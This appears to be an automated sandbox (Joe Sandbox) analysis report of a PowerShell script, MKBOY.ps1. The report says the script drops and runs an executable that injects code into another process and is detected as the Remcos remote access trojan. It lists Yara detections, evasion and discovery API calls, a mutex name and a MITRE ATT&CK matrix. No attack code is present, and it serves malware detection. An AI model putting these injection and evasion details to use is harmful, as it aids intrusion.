Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_0043B88D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_0043B88D
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_00434D6E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00434D6E
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 5_2_00434F01 SetUnhandledExceptionFilter,	5_2_00434F01

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Memory written: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 5_2_004197D9 mouse_event,

5_2_004197D9

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe"	Jump to behavior

Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000005.00000002.3373295175.000000000132F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000005.00000002.3373295175.000000000132F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerX
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000005.00000002.3373295175.0000000001311000.00000004.00000020.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000005.00000002.3373295175.0000000001357000.00000004.00000020.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000005.00000002.3373295175.00000000012D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 5_2_00435034 cpuid

5_2_00435034

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: GetLocaleInfoA,	5_2_0040F26B
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: EnumSystemLocalesW,	5_2_004520E2
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: EnumSystemLocalesW,	5_2_00452097
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: EnumSystemLocalesW,	5_2_004521B6
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: EnumSystemLocalesW,	5_2_0044844E
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: GetLocaleInfoW,	5_2_004525CB
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	5_2_00452757
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: GetLocaleInfoW,	5_2_00448937

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Queries volume information: C:\Users\user\Desktop\MKBOY.ps1 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RUNPEE.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 5_2_00404961 GetLocalTime,CreateEventA,CreateThread,

5_2_00404961

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 5_2_0041BB0E GetComputerNameExW,GetUserNameW,

5_2_0041BB0E

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3373295175.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3371811776.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 3064, type: MEMORYSTR

Remote Access Functionality

Detected Remcos RAT

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-DJTZHJ

Jump to behavior

Yara detected Remcos RAT

Source: Yara match	File source: 5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3373295175.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3371811776.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 3064, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: cmd.exe

5_2_00405091

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	111 Input Capture	1 System Time Discovery	Remote Services	11 Archive Collected Data	22 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	1 Windows Service	1 Bypass User Account Control	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	111 Input Capture	2 Encrypted Channel	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	2 Service Execution	Logon Script (Windows)	1 Access Token Manipulation	4 Obfuscated Files or Information	Security Account Manager	1 System Service Discovery	SMB/Windows Admin Shares	3 Clipboard Data	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	1 Windows Service	12 Software Packing	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	112 Process Injection	1 Timestomp	LSA Secrets	43 System Information Discovery	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	131 Security Software Discovery	VNC	GUI Input Capture	112 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Bypass User Account Control	DCSync	41 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Masquerading	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	41 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	112 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report MKBOY.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
MKBOY.ps1